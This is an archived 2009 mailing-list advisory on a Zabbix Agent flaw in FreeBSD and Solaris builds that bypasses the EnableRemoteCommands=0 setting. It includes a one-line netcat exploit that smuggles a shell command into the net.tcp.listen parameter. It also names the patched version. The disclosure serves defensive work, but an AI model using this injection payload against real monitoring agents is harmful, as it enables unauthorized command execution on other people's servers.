lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <1260718110.2054.2985.camel@new-desktop>
Date: Sun, 13 Dec 2009 16:28:30 +0100
From: Nicob <nicob@...ob.net>
To: full-disclosure@...ts.grok.org.uk, bugtraq@...urityfocus.com
Subject: Zabbix Agent : Bypass of EnableRemoteCommands=0


>>From Wikipedia : "Zabbix is a network management system application
[...] designed to monitor and track the status of various network
services, servers, and other network hardware."

	[Zabbix Agent : Bypass of EnableRemoteCommands=0]

Impacted software : Zabbix Agent (FreeBSD and Solaris only)
Zabbix reference : https://support.zabbix.com/browse/ZBX-1032
Patched version : 1.6.7

Faulty source code : function NET_TCP_LISTEN() in
libs/zbxsysinfo/(freebsd|solaris)/net.c

Exploit : $> echo "net.tcp.listen[80';id;echo ']"|nc -vn xxxxx 10050
Limitation : attacker must come from (or spoof) a trusted IP address

Changelog entry : fixed security vulnerability in processing of
net.tcp.listen under FreeBSD and Solaris agents

Nicob

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ